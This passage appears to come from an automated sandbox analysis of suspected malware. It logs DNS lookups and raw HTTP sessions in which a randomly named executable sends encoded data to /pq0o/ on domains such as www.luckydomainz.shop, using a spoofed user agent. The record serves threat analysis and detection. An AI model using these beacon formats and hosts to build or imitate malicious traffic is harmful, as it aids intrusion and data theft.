Apr 23, 2024 08:38:25.948117018 CEST	192.168.2.5	1.1.1.1	0x1942	Standard query (0)	www.xn--yzyp76d.com	A (IP address)	IN (0x0001)	false
Apr 23, 2024 08:38:47.175105095 CEST	192.168.2.5	1.1.1.1	0x5dba	Standard query (0)	www.luckydomainz.shop	A (IP address)	IN (0x0001)	false
Apr 23, 2024 08:39:02.863578081 CEST	192.168.2.5	1.1.1.1	0x3cc3	Standard query (0)	www.cd14j.us	A (IP address)	IN (0x0001)	false
Apr 23, 2024 08:39:18.003223896 CEST	192.168.2.5	1.1.1.1	0x8aab	Standard query (0)	www.fashionagencylab.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 23, 2024 08:38:26.488770962 CEST	1.1.1.1	192.168.2.5	0x1942	No error (0)	www.xn--yzyp76d.com		47.76.62.167	A (IP address)	IN (0x0001)	false
Apr 23, 2024 08:38:47.277105093 CEST	1.1.1.1	192.168.2.5	0x5dba	No error (0)	www.luckydomainz.shop	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 23, 2024 08:38:47.277105093 CEST	1.1.1.1	192.168.2.5	0x5dba	No error (0)	parkingpage.namecheap.com		91.195.240.19	A (IP address)	IN (0x0001)	false
Apr 23, 2024 08:39:03.239623070 CEST	1.1.1.1	192.168.2.5	0x3cc3	No error (0)	www.cd14j.us		91.195.240.123	A (IP address)	IN (0x0001)	false
Apr 23, 2024 08:39:18.266835928 CEST	1.1.1.1	192.168.2.5	0x8aab	No error (0)	www.fashionagencylab.com		91.195.240.117	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.xn--yzyp76d.com

www.luckydomainz.shop

www.cd14j.us

www.fashionagencylab.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49720	47.76.62.167	80	6976	C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe

Timestamp	Bytes transferred	Direction	Data
Apr 23, 2024 08:38:26.805083990 CEST	369	OUT	GET /pq0o/?Lx=8PqlJ028VT_&sHlxgpX=J8WC84xruYdLZ+88O/faPZDbDvgvpAFcdnGo6AhEflv3qioXWy6Vm5wGjKWjZFBj5bzfVwWaJCB72b3lEpkTVQZSX1dtpaRBnFtuiUAedf4oW0TmsJoC9BTZIWyKDmIsTQ== HTTP/1.1 Host: www.xn--yzyp76d.com Accept: / Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com
Apr 23, 2024 08:38:27.112227917 CEST	1289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 23 Apr 2024 06:38:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Data Raw: 64 34 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 3c 74 69 74 6c 65 3e e9 95 bf e7 9b 9b 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 61 72 6b 73 6d 69 6c 65 2e 63 6f 6d 2f 61 73 73 65 74 2f 6c 70 5f 73 74 79 6c 65 2e 63 73 73 22 20 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 61 69 6c 2e 33 36 35 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 68 74 6d 6c 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 66 69 6c 65 2f 6d 61 69 6c 2e 70 6e 67 22 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 68 65 69 67 68 74 3d 22 61 75 74 6f 22 20 61 6c 74 3d 22 33 36 35 e9 82 ae e7 ae b1 22 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 3b 7a 2d 69 6e 64 65 78 3a 20 31 3b 22 3e 3c 2f 61 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6d 22 20 3e 3c 68 32 20 69 64 3d 22 64 6f 6d 61 69 6e 22 3e e9 95 bf e7 9b 9b 2e 63 6f 6d 3c 2f 68 32 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 67 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 2f 2f 63 6f 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 22 3e 0a 3c 74 61 62 6c 65 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 30 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22 3e 0a 3c 74 72 3e 3c 74 64 20 61 6c 69 67 6e 3d 22 6c 65 66 74 22 3e e5 9f 9f e5 90 8d e6 89 98 e7 ae a1 e5 95 86 3a 3c 69 6d 67 20 73 72 63 3d 22 66 69 6c 65 2f 6d 61 72 6b 73 6d 69 6c 65 20 31 2e 70 6e 67 22 20 77 69 64 74 68 3d 22 37 36 22 20 68 65 69 67 68 74 3d 22 32 30 22 20 61 6c 74 3d 22 e5 90 8d e5 95 86 e7 bd 91 22 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 37 70 78 3b 22 20 2f 3e 3c 2f 74 64 3e 3c 74 64 20 61 6c 69 67 6e 3d 22 72 69 67 68 74 22 20 72 6f 77 73 70 61 6e 3d 22 34 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 65 63 68 61 74 22 3e e5 be ae e4 bf a1 e5 ae a2 e6 9c Data Ascii: d49<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width"><title>.com</title> <link rel="stylesheet" href="http://www.marksmile.com/asset/lp_style.css" ></head><body><div class="main"><a href="https://mail.365.com/login.html" target="_blank"><img src="/file/mail.png" width="100%" height="auto" alt="365" style="position: absolute;top:0;left:0;z-index: 1;"></a><div class="dm" ><h2 id="domain">.com</h2></div><div class="bg"><div class="a"></div><div class="b"></div><div class="c"></div><div class="d"></div></div>...//co--><div class="co"><table align="center" border="0" cellpadding="0" cellspacing="0"><tr><td align="left">:<img src="file/marksmile 1.png" width="76" height="20" alt="" style="position: absolute;margin-left: 7px;" /></td><td align="right" rowspan="4"><div class="wechat">
Apr 23, 2024 08:38:27.112334013 CEST	1289	IN	Data Raw: 8d 3a 3c 65 6d 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 70 78 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 22 3e ef bc 88 e8 af b7 e5 a4 87 e6 b3 a8 e5 9f 9f e5 90 Data Ascii: :<em style="display: block;font-size: 10px;font-style: normal;"></em><img class="wcode" width="60" height="60" src="http://www.marksmile.com/asset/lp_qrcode.png" id="myImage" /></div></td></tr><tr><td align="left"><div c
Apr 23, 2024 08:38:27.112356901 CEST	1018	IN	Data Raw: 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 76 61 72 20 69 6d 61 67 65 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 Data Ascii: e="application/javascript"></script><script> var image = document.getElementById("myImage"); // // function createEnlargedContainer() { var container = document.createElement('div
Apr 23, 2024 08:38:27.112375975 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49721	91.195.240.19	80	6976	C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe

Timestamp	Bytes transferred	Direction	Data
Apr 23, 2024 08:38:47.457494974 CEST	635	OUT	POST /pq0o/ HTTP/1.1 Host: www.luckydomainz.shop Accept: / Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.luckydomainz.shop Content-Length: 208 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.luckydomainz.shop/pq0o/ User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com Data Raw: 73 48 6c 78 67 70 58 3d 2b 6e 41 65 47 7a 57 59 75 77 46 2f 37 67 35 74 74 43 52 6a 56 47 79 7a 44 62 48 34 68 5a 45 42 31 75 76 37 4b 46 38 77 45 48 77 49 41 72 6a 4f 6b 2b 34 69 2f 49 77 6f 39 46 56 44 65 30 37 51 2b 32 7a 70 63 6c 43 64 43 4a 74 46 57 37 6f 37 75 43 42 2f 4e 46 43 53 56 35 44 77 62 31 78 53 78 4c 56 65 52 65 4d 5a 30 64 41 79 32 5a 4f 51 51 4d 46 4b 73 68 6e 69 64 4d 78 6e 66 48 4b 78 50 64 49 4f 6b 47 30 4e 74 32 2f 6c 30 59 63 2f 59 38 4e 4f 4b 6e 49 46 61 51 51 38 2f 5a 71 42 35 72 63 6d 6b 32 6e 4c 42 6a 46 63 39 44 52 6f 38 6d 31 47 34 78 7a 45 64 4a 71 58 5a 70 5a 5a 69 6f 4a 6a 38 34 38 3d Data Ascii: sHlxgpX=+nAeGzWYuwF/7g5ttCRjVGyzDbH4hZEB1uv7KF8wEHwIArjOk+4i/Iwo9FVDe07Q+2zpclCdCJtFW7o7uCB/NFCSV5Dwb1xSxLVeReMZ0dAy2ZOQQMFKshnidMxnfHKxPdIOkG0Nt2/l0Yc/Y8NOKnIFaQQ8/ZqB5rcmk2nLBjFc9DRo8m1G4xzEdJqXZpZZioJj848=
Apr 23, 2024 08:38:47.634747982 CEST	701	IN	HTTP/1.1 405 Not Allowed date: Tue, 23 Apr 2024 06:38:47 GMT content-type: text/html content-length: 556 server: NginX connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49722	91.195.240.19	80	6976	C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe

Timestamp	Bytes transferred	Direction	Data
Apr 23, 2024 08:38:51.333786011 CEST	655	OUT	POST /pq0o/ HTTP/1.1 Host: www.luckydomainz.shop Accept: / Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.luckydomainz.shop Content-Length: 228 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.luckydomainz.shop/pq0o/ User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com Data Raw: 73 48 6c 78 67 70 58 3d 2b 6e 41 65 47 7a 57 59 75 77 46 2f 36 41 70 74 72 68 35 6a 65 47 79 30 66 4c 48 34 37 70 45 46 31 75 54 37 4b 45 34 47 45 30 45 49 4f 76 6e 4f 32 36 6b 69 7a 6f 77 6f 79 6c 56 47 54 55 37 74 2b 78 37 4c 63 67 69 64 43 50 42 46 57 36 59 37 75 78 5a 38 4c 56 43 55 4d 70 44 79 55 56 78 53 78 4c 56 65 52 65 4a 43 30 65 77 79 32 4a 2b 51 52 70 78 4a 6c 42 6e 68 58 73 78 6e 56 6e 4b 31 50 64 49 6f 6b 44 73 72 74 30 33 6c 30 5a 73 2f 4a 49 5a 4e 45 6e 49 48 57 41 52 43 31 37 37 57 67 72 45 67 75 6e 72 4f 51 46 56 59 38 31 38 43 6d 45 39 75 72 52 66 38 4e 61 69 67 49 5a 34 77 34 4c 5a 54 69 76 71 46 31 7a 34 4b 79 59 42 2f 4d 4a 54 2f 64 2b 2b 39 6e 67 54 62 Data Ascii: sHlxgpX=+nAeGzWYuwF/6Aptrh5jeGy0fLH47pEF1uT7KE4GE0EIOvnO26kizowoylVGTU7t+x7LcgidCPBFW6Y7uxZ8LVCUMpDyUVxSxLVeReJC0ewy2J+QRpxJlBnhXsxnVnK1PdIokDsrt03l0Zs/JIZNEnIHWARC177WgrEgunrOQFVY818CmE9urRf8NaigIZ4w4LZTivqF1z4KyYB/MJT/d++9ngTb
Apr 23, 2024 08:38:51.509423971 CEST	701	IN	HTTP/1.1 405 Not Allowed date: Tue, 23 Apr 2024 06:38:51 GMT content-type: text/html content-length: 556 server: NginX connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49723	91.195.240.19	80	6976	C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe

Timestamp	Bytes transferred	Direction	Data
Apr 23, 2024 08:38:54.043353081 CEST	1672	OUT	POST /pq0o/ HTTP/1.1 Host: www.luckydomainz.shop Accept: / Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.luckydomainz.shop Content-Length: 1244 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.luckydomainz.shop/pq0o/ User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com Data Raw: 73 48 6c 78 67 70 58 3d 2b 6e 41 65 47 7a 57 59 75 77 46 2f 36 41 70 74 72 68 35 6a 65 47 79 30 66 4c 48 34 37 70 45 46 31 75 54 37 4b 45 34 47 45 31 38 49 4f 63 76 4f 31 62 6b 69 39 49 77 6f 73 56 56 48 54 55 37 38 2b 77 66 50 63 67 6e 71 43 4b 64 46 58 63 6b 37 35 51 5a 38 46 56 43 55 52 35 44 2f 62 31 77 53 78 4c 46 43 52 65 5a 43 30 65 77 79 32 50 53 51 42 4d 46 4a 6a 42 6e 69 64 4d 78 72 66 48 4b 4e 50 5a 63 57 6b 43 59 37 74 46 58 6c 30 35 38 2f 4c 64 4e 4e 62 33 49 2f 56 41 52 4b 31 37 32 52 67 72 6f 64 75 6e 65 68 51 43 35 59 38 78 68 6f 37 30 39 43 70 6d 37 45 46 34 75 4f 51 35 6b 32 32 49 56 41 68 50 32 67 31 44 67 49 37 4f 39 6e 47 72 53 78 4f 61 43 53 69 51 47 55 2f 55 59 44 64 65 5a 43 4e 70 49 51 65 75 2f 34 74 52 6c 41 74 6d 35 56 53 6c 6e 4c 6f 41 4e 56 49 41 70 6b 71 35 66 74 42 57 6a 6f 54 78 2f 44 6a 63 42 74 4d 34 47 52 62 61 34 49 33 57 68 56 44 6a 73 6a 44 76 6c 72 68 76 37 34 38 42 73 66 32 4d 47 33 6a 65 6a 2f 44 71 37 42 75 45 4e 6c 67 30 6b 70 66 43 35 35 4d 43 69 4f 6f 74 2f 4c 5a 5a 48 33 45 67 76 2f 53 6e 46 46 4a 76 62 36 6a 41 74 71 73 74 53 36 48 38 6b 46 75 6c 79 46 4a 79 37 51 6a 6a 48 44 62 6a 46 78 62 44 51 33 64 30 6d 30 45 65 4e 75 41 5a 48 4f 6e 61 4f 59 58 65 71 63 65 62 45 34 2b 4e 6e 67 50 37 4b 43 49 79 41 68 39 74 78 6f 6b 58 76 74 64 6d 54 54 48 34 46 4e 75 6f 6b 42 30 45 44 6f 38 4a 6a 62 2b 4d 4c 79 34 49 58 2f 41 6f 55 4c 37 76 52 69 30 59 69 33 55 75 6d 4e 35 78 64 68 50 39 48 6d 36 51 77 7a 6f 56 4b 55 63 31 4f 43 6c 68 44 38 65 72 33 62 71 55 41 75 32 32 4f 52 72 6a 37 4f 2b 64 50 33 7a 50 67 63 4c 66 36 77 36 41 69 66 38 63 52 70 46 68 32 37 72 39 6d 4c 64 42 57 34 65 69 6c 6c 31 4b 49 34 6b 62 4a 48 39 6e 64 74 42 78 6b 64 70 36 62 33 42 4f 70 7a 4a 71 4f 48 45 6a 53 6a 41 43 2f 70 79 6e 78 44 5a 6e 79 2b 76 63 2f 78 61 49 4b 59 2b 35 79 50 4a 4a 4f 6e 2b 55 53 67 68 46 77 63 4b 6d 62 33 6a 77 59 49 43 57 37 42 62 58 4b 76 47 30 45 79 2b 79 71 56 79 56 2b 5a 77 47 45 4d 34 39 77 65 56 68 77 68 58 72 46 70 48 62 5a 63 6f 77 2f 78 56 69 72 56 4c 57 50 4d 39 4a 72 44 62 38 39 43 50 69 76 54 6c 2b 6c 67 48 54 71 67 37 46 55 4a 54 72 6d 4b 5a 4e 5a 4d 46 76 78 54 48 70 73 44 30 42 4e 44 42 6e 5a 55 65 2f 30 67 6e 42 4b 34 4d 45 6e 75 56 74 2b 71 70 4f 4c 76 6f 65 52 48 73 35 4e 47 2b 44 34 41 36 71 37 35 36 6d 73 78 47 4f 71 30 68 6e 32 31 59 37 77 6f 6f 59 66 69 6c 48 62 33 63 47 68 4e 6a 49 59 76 62 45 76 76 6f 61 39 78 6f 49 61 56 51 61 45 35 64 55 35 44 41 2b 57 62 61 53 62 70 43 39 64 4d 6b 62 48 62 65 4f 61 52 4c 39 79 53 4d 7a 6b 41 30 2b 4d 45 32 77 46 48 35 4b 6a 39 37 4b 32 74 65 4b 56 41 31 5a 35 44 6e 6f 74 4b 58 55 6d 6f 39 71 79 79 67 58 74 30 6a 6a 45 53 71 78 31 70 39 38 78 4e 37 30 33 51 71 67 42 74 63 51 6c 6b 56 6d 53 6a 6d 59 64 56 37 62 73 4b 50 48 51 4f 7a 64 77 32 6f 57 4a 75 36 42 41 36 36 2f 79 41 4a 42 32 6f 46 2f 63 2f 72 31 6d 6d 76 48 36 39 2f 63 77 34 79 43 6d 34 51 74 43 6d 46 30 39 66 37 79 51 72 32 34 32 4a 52 68 59 41 36 48 4a 31 63 57 65 52 50 47 39 6f 52 4f 7a 36 4c 74 68 55 46 57 4a 53 31 4e 6f 37 46 4c 62 42 6b 42 31 55 35 30 73 72 4c 7a 67 4e 44 4e 71 66 41 54 76 58 35 37 62 68 5a 74 6c 55 6f 37 75 53 35 41 34 63 35 30 53 79 38 76 56 57 69 55 49 2b 51 62 53 63 6e 75 43 56 51 7a 36 53 53 4e 5a 4e 44 31 53 7a 46 49 51 55 45 6a 6d 59 49 6d 63 43 49 37 73 35 55 2f 73 77 57 77 2f 47 6d 66 49 54 52 75 55 45 68 43 46 66 51 2f 69 4e 34 7a 64 46 64 70 50 58 57 6a 6a 56 35 32 42 79 46 77 59 2b 58 66 45 55 71 35 79 62 75 51 66 74 67 59 50 62 43 45 47 74 51 64 55 75 44 6d 58 50 50 38 4e 77 46 6a 62 4c 33 2f 75 59 44 65 56 71 43 5a 38 4f 47 52 45 7a 76 38 61 68 4e 66 4a 4d 37 47 76 51 78 76 6e 32 6d 5a 6a 69 64 66 61 4f 5a 39 47 32 66 37 54 6c 4d 58 6c 34 6b 6b 4e 78 2f 71 77 57 34 67 3d 3d Data Ascii: sHlxgpX=+nAeGzWYuwF/6Aptrh5jeGy0fLH47pEF1uT7KE4GE18IOcvO1bki9IwosVVHTU78+wfPcgnqCKdFXck75QZ8FVCUR5D/b1wSxLFCReZC0ewy2PSQBMFJjBnidMxrfHKNPZcWkCY7tFXl058/LdNNb3I/VARK172RgrodunehQC5Y8xho709Cpm7EF4uOQ5k22IVAhP2g1DgI7O9nGrSxOaCSiQGU/UYDdeZCNpIQeu/4tRlAtm5VSlnLoANVIApkq5ftBWjoTx/DjcBtM4GRba4I3WhVDjsjDvlrhv748Bsf2MG3jej/Dq7BuENlg0kpfC55MCiOot/LZZH3Egv/SnFFJvb6jAtqstS6H8kFulyFJy7QjjHDbjFxbDQ3d0m0EeNuAZHOnaOYXeqcebE4+NngP7KCIyAh9txokXvtdmTTH4FNuokB0EDo8Jjb+MLy4IX/AoUL7vRi0Yi3UumN5xdhP9Hm6QwzoVKUc1OClhD8er3bqUAu22ORrj7O+dP3zPgcLf6w6Aif8cRpFh27r9mLdBW4eill1KI4kbJH9ndtBxkdp6b3BOpzJqOHEjSjAC/pynxDZny+vc/xaIKY+5yPJJOn+USghFwcKmb3jwYICW7BbXKvG0Ey+yqVyV+ZwGEM49weVhwhXrFpHbZcow/xVirVLWPM9JrDb89CPivTl+lgHTqg7FUJTrmKZNZMFvxTHpsD0BNDBnZUe/0gnBK4MEnuVt+qpOLvoeRHs5NG+D4A6q756msxGOq0hn21Y7wooYfilHb3cGhNjIYvbEvvoa9xoIaVQaE5dU5DA+WbaSbpC9dMkbHbeOaRL9ySMzkA0+ME2wFH5Kj97K2teKVA1Z5DnotKXUmo9qyygXt0jjESqx1p98xN703QqgBtcQlkVmSjmYdV7bsKPHQOzdw2oWJu6BA66/yAJB2oF/c/r1mmvH69/cw4yCm4QtCmF09f7yQr242JRhYA6HJ1cWeRPG9oROz6LthUFWJS1No7FLbBkB1U50srLzgNDNqfATvX57bhZtlUo7uS5A4c50Sy8vVWiUI+QbScnuCVQz6SSNZND1SzFIQUEjmYImcCI7s5U/swWw/GmfITRuUEhCFfQ/iN4zd